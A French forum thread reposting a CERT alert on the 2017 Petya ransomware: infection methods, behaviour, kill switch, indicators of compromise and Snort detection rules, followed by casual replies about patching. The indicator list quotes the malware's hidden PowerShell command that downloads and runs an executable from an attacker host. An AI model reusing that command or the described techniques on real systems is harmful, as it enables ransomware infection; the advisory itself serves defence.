Virus

Virus

Messagepar Amone » Mer 28 Juin 2017 09:44

FYI la description du nouveau virus et les actions de celui-ci.

Hello everybody,

FYI.

___________________________________________________________________

PETYA ALERT - ALLIACERT JUNE 2017
 
You will find below more details about the attack, and the alert will be kept up-to-date.
 
Summary [Updated]
Malware name : Petya / Mischa / Petrwrap
Infection and propagation : The ETERNALBLUE exploit is in use within this ransomware. All Microsoft Windows versions that were vulnerable to WannaCry and not patched with MS-17-010 are targeted by this attack. it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010),
The ransomware could use pass the hash techique for attack computers in same active directory or cloned machines.
Spams and Spear-phishing may be used.
The ransomware encrypts MFT (Master File Tree) tables for NTFS partitions and overwrites the MBR (Master Boot Record) with a custom bootloader that shows a ransom note and prevents victims from booting their computer.
The ransomware displays a text, demanding $300 worth of Bitcoins.
Classification [Updated]
 
Online dynamic analysis  :
 
Copies itself to C:\Windows\
Drops a PE file to C:\Windows\dllhost.dat
Attempts to connect to port 445 and initiate an SMB handshake, probably attempting to use ETERNALBLUE to spread itself.
Creates a scheduled task file to induce a reboot at a specified time. Creates it using schtasks
Uses wevtutil.exe to clear Setup, System, Security, and Application logs
Uses fsutil.exe to delete the update sequence number (USN) change journal, which provides a log of all changes made to files on the volume, in this case "C:".
 
Static analysis
Target the following files for encryption: .3ds, .7z, .accdb, .ai, .asp, .aspx, .avhd, .back, .bak, .c, .cfg, .conf, .cpp, .cs, .ctl, .dbf, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .kdbx, .mail, .mdb, .msg, .nrg, .ora, .ost, .ova, .ovf, .pdf, .php, .pmf, .ppt, .pptx, .pst, .pvi, .py, .pyc, .rar, .rtf, .sln, .sql, .tar, .vbox, .vbs, .vcb, .vdi, .vfd, .vmc, .vmdk, .vmsd, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xvd, .zip
Contains two PE files embedded in it.
Recommendations [Updated]
 
Ensure that all versions of Windows are patched up to the latest currently available.
Disable the outdated protocol SMBv1
Isolate unpatched systems from the larger network
Kill switch [New]
 
The following block has been effective in stopping the spread of infection via psexec and wmi in some environments. Please assess the risk of implementation in your environment before proceeding:
Block C:\Windows\perfc.dat from writing/executing for rundll32 import
},
exe: "C:\Windows\SysWOW64\rundll32.exe",
username: "NT AUTHORITY\SYSTEM",
ppid: 55140,
cmdline: [
    "C:\Windows\System32\rundll32.exe",
    "C:\Windows\perfc.dat,#1",
    "10",
    "<credentials here in clear-text>"
 
Indicators of Compromise (IoC) [Updated]
 Type Indicator
file Петя.apx
file myguy.xls
file myguy.exe
file Order-20061017.doc
file petwrap.exe
email wowsmith123456@posteo.net
email iva76y3pr@outlook.com 
email carmellar4hegp@outlook.com
email amanda44i8sq@outlook.com 
Bitcoin wallet 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
url  french-cooking.com
url  sundanders.online
url  casconut.xyz
url  blumbeerg.xyz  
url  insurepol.in
url  whitefoam.org.uk
url  xfusion.co.uk  
url  affliates.in  
url  chyporus.in
url  coffeinoffice.xyz  
url  dantan.club  
url  kababmachatu.xyz  
url  damodot.xyz 
url  ballotvize.xyz
url h11p://84.200.16.242/myguy.xls
url COFFEINOFFICE.XYZ
url https://yadi.sk/d/S0-ZhPY53KWc84
url https://yadi.sk/d/Zpkm88sp3KWc8v
IP 111.90.139.247
IP  95.141.115.108
IP  185.165.29.78
IP 84.200.16.242
FilePath dllhost.dat
PowerShell powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
PowerShell 10807.exe %APPDATA%\10807.exe" "
Mutex 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
Mutex 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
Mutex f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5 (signed PSEXEC.EXE)
Mutex 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f95222634b362ca5
Mutex eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (32-bit EXE)
FileHash 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
FileHash FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
FileHash EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
FileHash 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
FileHash 101CC1CB56C407D5B9149F2C3B8523350D23BA84
FileHash 736752744122A0B5EE4B95DDAD634DD225DC0F73
FileHash 8a241cfcc23dc740e1fadc7f2df3965e
FileHash c8e4829dcba8b288bd0ed75717214db6 
FileHash 10b2d20a3c36fe6a5bf6f3b15149c3d1
FileHash 34da44570eb8c7a5038370f553eb3899  
FileHash 71b6a493388e7d0b40c83ce903bc6b04
FileHash 415FE69BF32634CA98FA07633F4118E1
FileHash 0487382A4DAF8EB9660F1C67E30F8B25
FileHash bec678164cedea578a7aff4589018fa41551c27f
FileHash a809a63bc5e31670ff117d838522dec433f74bee
FileHash bec678164cedea578a7aff4589018fa41551c27f
FileHash d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
FileHash aba7aa41057c8a6b184ba5776c20f7e8fc97c657
FileHash 0ff07caedad54c9b65e5873ac2d81b3126754aac
FileHash 51eafbb626103765d3aedfd098b94d0e77de1196
FileHash 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
FileHash 7ca37b86f4acc702f108449c391dd2485b5ca18c
FileHash 2bc182f04b935c7e358ed9c9e6df09ae6af47168
FileHash 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
FileHash 82920a2ad0138a2a8efc744ae5849c6dde6b435d
FileHash 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
FileHash  5d91f2c2ed8d83739522eb234452f230ebf4b9e1f8cd8d097d99c583e85695aa
FileHash  f2dcaf0636a58a2b5a063b40571a12b09f1623c9172cfc6ddb4dc46a51ede7f0
FileHash  9717cfdc2d023812dbc84a941674eb23a2a8ef06
FileHash  7e37ab34ecdcc3e77e24522ddfd4852d
FileHash  02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
FileHash  0487382a4daf8eb9660f1c67e30f8b25
FileHash  101cc1cb56c407d5b9149f2c3b8523350d23ba84
FileHash  17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd
FileHash  415fe69bf32634ca98fa07633f4118e1
FileHash  56be65c707816da80df0e66bf82506e88996fc398c0b0f0a55af920d7506cca8
FileHash  64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
FileHash  736752744122a0b5ee4b95ddad634dd225dc0f73
FileHash  9288fb8e96d419586fc8c595dd95353d48e8a060
FileHash  a1d5895f85751dfe67d19cccb51b051a
FileHash  ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6
FileHash  fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206
FileHash  e285b6ce047015943e685e6638bd837e
FileHash  ccaeb42bbcaa53b583e1bbb4f3e883c7
FileHash  e595c02185d8e12be347915865270cca
FileHash  71b6a493388e7d0b40c83ce903bc6b04

 
 
OPEN SNORT Alerts [New]
 
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)
alert tcp any any -> any 445 (msg:"ET CURRENT_EVENTS ETERNALBLUE Exploit M2 MS17-010"; flow:established,to_server; content:"|8000a80000000000000000000000000000000000ffff000000000000ffff0000000000000000000000000000000000000000000000f1dfff000000000000000020f0dfff00f1dfffffffffff600004100000000080efdfff|";  CVE-2017-0143 classtype:attempted-admin; sid:2024297; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)
Even if the morrow is barren of promises,
Nothing shall forestall my return
To become the dew that quenches the lands,
To spare the sands, the seas, the skies
I offer thee this silent sacrifice.
Image
Avatar de l’utilisateur
Amone
Membres
 
Messages: 1560
Inscription: Lun 29 Sep 2014 20:27

Re: Virus

Messagepar Bakaa » Mer 28 Juin 2017 13:51

En bref et en FR ?
Avatar de l’utilisateur
Bakaa
Apply
 
Messages: 126
Inscription: Lun 16 Jan 2017 20:52

Re: Virus

Messagepar warnol » Mer 28 Juin 2017 14:13

En bref meme attaque qu'en début du mois avec WannaCry. Si tu as un windows met le à jour, si tu as un autre système osef.

Sinon n'ouvrez pas les pieces jointes dans les mails qui vous promettes fortunes et grosse bite...
Avatar de l’utilisateur
warnol
Administrateur du site
 
Messages: 628
Inscription: Jeu 6 Fév 2014 00:52

Re: Virus

Messagepar Ryllyah » Mer 28 Juin 2017 14:16

Amones tu bosse pas à la BNP ? J'ai vu que leur branche Real Estate avait été touchée.
Avatar de l’utilisateur
Ryllyah
Membres
 
Messages: 861
Inscription: Mar 13 Mai 2014 12:56

Re: Virus

Messagepar Ophay » Mer 28 Juin 2017 14:59

En meme temps si c'est Amones qui gère la sécurité.... :lol:
Avatar de l’utilisateur
Ophay
Membres
 
Messages: 792
Inscription: Sam 17 Mai 2014 22:03

Re: Virus

Messagepar Amone » Mer 28 Juin 2017 15:04

ouep Real estate sont dans la merde 4000 users sont au chomage technique mdr ^^
Even if the morrow is barren of promises,
Nothing shall forestall my return
To become the dew that quenches the lands,
To spare the sands, the seas, the skies
I offer thee this silent sacrifice.
Image
Avatar de l’utilisateur
Amone
Membres
 
Messages: 1560
Inscription: Lun 29 Sep 2014 20:27

Re: Virus

Messagepar Obscurus » Mer 28 Juin 2017 16:41

Nous on avait chopé un truc qui cryptait les fichiers en .nm4 au boulot, Saleté :p
Avatar de l’utilisateur
Obscurus
Membres
 
Messages: 123
Inscription: Mar 3 Jan 2017 09:33

Re: Virus

Messagepar Bakaa » Mer 28 Juin 2017 17:08

Obscurus a écrit:Nous on avait chopé un truc qui cryptait les fichiers en .nm4 au boulot, Saleté :p


Y s'en rappel c'est certain, 2 semaines de boulot au boulot !
Avatar de l’utilisateur
Bakaa
Apply
 
Messages: 126
Inscription: Lun 16 Jan 2017 20:52

Re: Virus

Messagepar Frize » Mer 28 Juin 2017 17:38

Wannacry s'oocupe d'une bèche de Windows pas de fishing ^^
Avatar de l’utilisateur
Frize
Apply
 
Messages: 43
Inscription: Mer 17 Mai 2017 22:30


Retourner vers Discussions publiques

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 4 invités

Qui est en ligne?

Nous avons 486 visiteurs et 8 membres en ligne:
  • Lucco  
  • pre7  
  • Rizoko  
  • bamlepretre  
  • adenek  
  • Amone  
  • Allsunday  
  • Shimishsar